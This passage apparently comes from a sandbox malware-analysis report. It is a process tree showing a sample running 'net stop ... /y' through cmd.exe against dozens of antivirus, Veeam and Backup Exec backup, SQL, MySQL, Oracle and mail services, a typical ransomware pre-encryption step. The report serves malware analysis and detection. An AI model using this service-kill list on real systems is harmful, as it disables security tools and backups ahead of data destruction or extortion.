    "C:\Windows\system32\cmd.exe" /C net stop MSSQLServerOLAPService /y
    3⤵
    PID:108
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQLServerOLAPService /y
      4⤵
      PID:688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
        5⤵
        
        PID:836
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop McAfeeEngineService /y
    3⤵
    PID:1988
  - - C:\Windows\SysWOW64\net.exe
      net stop McAfeeEngineService /y
      4⤵
      PID:556
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McAfeeEngineService /y
        5⤵
        
        PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop McAfeeFramework /y
    3⤵
    PID:896
  - - C:\Windows\SysWOW64\net.exe
      net stop McAfeeFramework /y
      4⤵
      PID:1300
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McAfeeFramework /y
        5⤵
        
        PID:756
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:1440
  - - C:\Windows\SysWOW64\net.exe
      net stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
        5⤵
        
        PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop McShield /y
    3⤵
    PID:1932
  - - C:\Windows\SysWOW64\net.exe
      net stop McShield /y
      4⤵
      PID:1680
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McShield /y
        5⤵
        
        PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop McTaskManager /y
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\net.exe
      net stop McTaskManager /y
      4⤵
      PID:1584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McTaskManager /y
        5⤵
        
        PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MsDtsServer /y
    3⤵
    PID:1196
  - - C:\Windows\SysWOW64\net.exe
      net stop MsDtsServer /y
      4⤵
      PID:1480
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MsDtsServer /y
        5⤵
        
        PID:1148
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MsDtsServer100 /y
    3⤵
    PID:560
  - - C:\Windows\SysWOW64\net.exe
      net stop MsDtsServer100 /y
      4⤵
      PID:1136
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MsDtsServer100 /y
        5⤵
        
        PID:1092
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MsDtsServer110 /y
    3⤵
    PID:1924
  - - C:\Windows\SysWOW64\net.exe
      net stop MsDtsServer110 /y
      4⤵
      PID:1908
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MsDtsServer110 /y
        5⤵
        
        PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MySQL57 /y
    3⤵
    PID:1708
  - - C:\Windows\SysWOW64\net.exe
      net stop MySQL57 /y
      4⤵
      PID:2000
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MySQL57 /y
        5⤵
        
        PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop MySQL80 /y
    3⤵
    PID:752
  - - C:\Windows\SysWOW64\net.exe
      net stop MySQL80 /y
      4⤵
      PID:320
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MySQL80 /y
        5⤵
        
        PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop NetMsmqActivator /y
    3⤵
    PID:1536
  - - C:\Windows\SysWOW64\net.exe
      net stop NetMsmqActivator /y
      4⤵
      PID:1644
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop NetMsmqActivator /y
        5⤵
        
        PID:432
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop OracleClientCache80 /y
    3⤵
    PID:836
  - - C:\Windows\SysWOW64\net.exe
      net stop OracleClientCache80 /y
      4⤵
      PID:1928
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop OracleClientCache80 /y
        5⤵
        
        PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop PDVFSService /y
    3⤵
    PID:1912
  - - C:\Windows\SysWOW64\net.exe
      net stop PDVFSService /y
      4⤵
      PID:968
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop PDVFSService /y
        5⤵
        
        PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop POP3Svc /y
    3⤵
    PID:1736
  - - C:\Windows\SysWOW64\net.exe
      net stop POP3Svc /y
      4⤵
      PID:896
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop POP3Svc /y
        5⤵
        
        PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop RESvc /y
    3⤵
    PID:1492
  - - C:\Windows\SysWOW64\net.exe
      net stop RESvc /y
      4⤵
      PID:1440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RESvc /y
        5⤵
        
        PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ReportServer /y
    3⤵
    PID:1144
  - - C:\Windows\SysWOW64\net.exe
      net stop ReportServer /y
      4⤵
      PID:1932
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer /y
        5⤵
        
        PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ReportServer$SQL_2008 /y
    3⤵
    PID:1156
  - - C:\Windows\SysWOW64\net.exe
      net stop ReportServer$SQL_2008 /y
      4⤵
      PID:1648
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
        5⤵
        
        PID:1340
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:1184
  - - C:\Windows\SysWOW64\net.exe
      net stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:1196
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
        5⤵
        
        PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ReportServer$TPS /y
    3⤵
    PID:592
  - - C:\Windows\SysWOW64\net.exe
      net stop ReportServer$TPS /y
      4⤵
      PID:560
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$TPS /y
        5⤵
        
        PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ReportServer$TPSAMA /y
    3⤵
    PID:268
  - - C:\Windows\SysWOW64\net.exe
      net stop ReportServer$TPSAMA /y
      4⤵
      PID:1924
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
        5⤵
        
        PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SAVAdminService /y
    3⤵
    PID:1600
  - - C:\Windows\SysWOW64\net.exe
      net stop SAVAdminService /y
      4⤵
      PID:1640
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SAVAdminService /y
        5⤵
        
        PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SAVService /y
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\net.exe
      net stop SAVService /y
      4⤵
      PID:752
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SAVService /y
        5⤵
        
        PID:828
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SDRSVC /y
    3⤵
    PID:240
  - - C:\Windows\SysWOW64\net.exe
      net stop SDRSVC /y
      4⤵
      PID:1536
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SDRSVC /y
        5⤵
        
        PID:616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SMTPSvc /y
    3⤵
    PID:1496
  - - C:\Windows\SysWOW64\net.exe
      net stop SMTPSvc /y
      4⤵
      PID:836
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SMTPSvc /y
        5⤵
        
        PID:688
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SNAC /y
    3⤵
    PID:360
  - - C:\Windows\SysWOW64\net.exe
      net stop SNAC /y
      4⤵
      PID:1912
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SNAC /y
        5⤵
        
        PID:556
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:1324
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:1736
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
        5⤵
        
        PID:980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:1780
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:1492
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
        5⤵
        
        PID:584
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$CXDB /y
    3⤵
    PID:1512
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$CXDB /y
      4⤵
      PID:1144
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$CXDB /y
        5⤵
        
        PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$ECWDB2 /y
    3⤵
    PID:1616
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$ECWDB2 /y
      4⤵
      PID:1320
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
        5⤵
        
        PID:1156
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:988
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:1184
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
        5⤵
        
        PID:824
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:1728
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:592
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
        5⤵
        
        PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PROD /y
    3⤵
    PID:772
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$PROD /y
      4⤵
      PID:268
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$PROD /y
        5⤵
        
        PID:1192
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:1600
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
        5⤵
        
        PID:1840
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:1672
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:1980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
        5⤵
        
        PID:1076
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:1552
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:1776
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
        5⤵
        
        PID:240
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SOPHOS /y
    3⤵
    PID:1464
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$SOPHOS /y
      4⤵
      PID:1496
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
        5⤵
        
        PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:1300
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:360
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
        5⤵
        
        PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SQL_2008 /y
    3⤵
    PID:568
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$SQL_2008 /y
      4⤵
      PID:1324
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
        5⤵
        
        PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:1680
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:1780
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
        5⤵
        
        PID:580
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$TPS /y
    3⤵
    PID:1584
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$TPS /y
      4⤵
      PID:1512
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$TPS /y
        5⤵
        
        PID:800
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$TPSAMA /y
    3⤵
    PID:1480
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$TPSAMA /y
      4⤵
      PID:1616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
        5⤵
        
        PID:1220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:1136
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:988
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
        5⤵
        
        PID:576
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:1908
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:1728
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
        5⤵
        
        PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:1704
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:1008
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
        5⤵
        
        PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLBrowser /y
    3⤵
    PID:1840
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLBrowser /y
      4⤵
      PID:1708
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser /y
        5⤵
        
        PID:752
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLSERVERAGENT /y
    3⤵
    PID:1076
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLSERVERAGENT /y
      4⤵
      PID:828
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLSERVERAGENT /y
        5⤵
        
        PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLSafeOLRService /y
    3⤵
    PID:240
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLSafeOLRService /y
      4⤵
      PID:1684
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLSafeOLRService /y
        5⤵
        
        PID:836
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLTELEMETRY /y
    3⤵
    PID:1528
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLTELEMETRY /y
      4⤵
      PID:1556
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLTELEMETRY /y
        5⤵
        
        PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:556
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
        5⤵
        
        PID:1736
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SQLWriter /y
    3⤵
    PID:1112
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLWriter /y
      4⤵
      PID:980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter /y
        5⤵
        
        PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SamSs /y
    3⤵
    PID:580
  - - C:\Windows\SysWOW64\net.exe
      net stop SamSs /y
      4⤵
      PID:584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SamSs /y
        5⤵
        
        PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SepMasterService /y
    3⤵
    PID:800
  - - C:\Windows\SysWOW64\net.exe
      net stop SepMasterService /y
      4⤵
      PID:1100
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SepMasterService /y
        5⤵
        
        PID:1320
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop ShMonitor /y
    3⤵
    PID:1220
  - - C:\Windows\SysWOW64\net.exe
      net stop ShMonitor /y
      4⤵
      PID:1156
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ShMonitor /y
        5⤵
        
        PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SmcService /y
    3⤵
    PID:576
  - - C:\Windows\SysWOW64\net.exe
      net stop SmcService /y
      4⤵
      PID:824
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SmcService /y
        5⤵
        
        PID:592
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop Smcinst /y
    3⤵
    PID:1608
  - - C:\Windows\SysWOW64\net.exe
      net stop Smcinst /y
      4⤵
      PID:1092
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Smcinst /y
        5⤵
        
        PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SntpService /y
    3⤵
    PID:1640
  - - C:\Windows\SysWOW64\net.exe
      net stop SntpService /y
      4⤵
      PID:1192
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SntpService /y
        5⤵
        
        PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop SstpSvc /y
    3⤵
    PID:752
  - - C:\Windows\SysWOW64\net.exe
      net stop SstpSvc /y
      4⤵
      PID:1276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SstpSvc /y
        5⤵
        
        PID:1928
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop TmCCSF /y
    3⤵
    PID:828
  - - C:\Windows\SysWOW64\net.exe
      net stop TmCCSF /y
      4⤵
      PID:856
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TmCCSF /y
        5⤵
        
        PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop TrueKey /y
    3⤵
    PID:836
  - - C:\Windows\SysWOW64\net.exe
      net stop TrueKey /y
      4⤵
      PID:1552
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TrueKey /y
        5⤵
        
        PID:872
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop TrueKeyScheduler /y
    3⤵
    PID:1912
  - - C:\Windows\SysWOW64\net.exe
      net stop TrueKeyScheduler /y
      4⤵
      PID:1688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TrueKeyScheduler /y
        5⤵
        
        PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop TrueKeyServiceHelper /y
    3⤵
    PID:1736
  - - C:\Windows\SysWOW64\net.exe
      net stop TrueKeyServiceHelper /y
      4⤵
      PID:1896
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
        5⤵
        
        PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop UI0Detect /y
    3⤵
    PID:1492
  - - C:\Windows\SysWOW64\net.exe
      net stop UI0Detect /y
      4⤵
      PID:756
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UI0Detect /y
        5⤵
        
        PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamBackupSvc /y
    3⤵
    PID:1144
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamBackupSvc /y
      4⤵
      PID:1816
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamBackupSvc /y
        5⤵
        
        PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamBrokerSvc /y
    3⤵
    PID:1320
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamBrokerSvc /y
      4⤵
      PID:1164
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamBrokerSvc /y
        5⤵
        
        PID:1340
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamCatalogSvc /y
    3⤵
    PID:1184
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamCatalogSvc /y
      4⤵
      PID:928
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCatalogSvc /y
        5⤵
        
        PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamCloudSvc /y
    3⤵
    PID:592
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamCloudSvc /y
      4⤵
      PID:1564
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCloudSvc /y
        5⤵
        
        PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamDeploySvc /y
    3⤵
    PID:1176
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamDeploySvc /y
      4⤵
      PID:1620
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDeploySvc /y
        5⤵
        
        PID:840
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamDeploymentService /y
    3⤵
    PID:2044
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamDeploymentService /y
      4⤵
      PID:772
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        5⤵
        
        PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:1672
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:472
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
        5⤵
        
        PID:564
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamHvIntegrationSvc /y
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamHvIntegrationSvc /y
      4⤵
      PID:1576
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
        5⤵
        
        PID:768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamMountSvc /y
    3⤵
    PID:616
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamMountSvc /y
      4⤵
      PID:432
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamMountSvc /y
        5⤵
        
        PID:908
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamNFSSvc /y
    3⤵
    PID:1464
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamNFSSvc /y
      4⤵
      PID:688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        5⤵
        
        PID:108
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamRESTSvc /y
    3⤵
    PID:1988
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamRESTSvc /y
      4⤵
      PID:1300
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamRESTSvc /y
        5⤵
        
        PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop VeeamTransportSvc /y
    3⤵
    PID:1244
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamTransportSvc /y
      4⤵
      PID:568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        5⤵
        
        PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop W3Svc /y
    3⤵
    PID:984
  - - C:\Windows\SysWOW64\net.exe
      net stop W3Svc /y
      4⤵
      PID:1680
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop W3Svc /y
        5⤵
        
        PID:1780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop WRSVC /y
    3⤵
    PID:1028
  - - C:\Windows\SysWOW64\net.exe
      net stop WRSVC /y
      4⤵
      PID:1584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop WRSVC /y
        5⤵
        
        PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop bedbg /y
    3⤵
    PID:2028
  - - C:\Windows\SysWOW64\net.exe
      net stop bedbg /y
      4⤵
      PID:1480
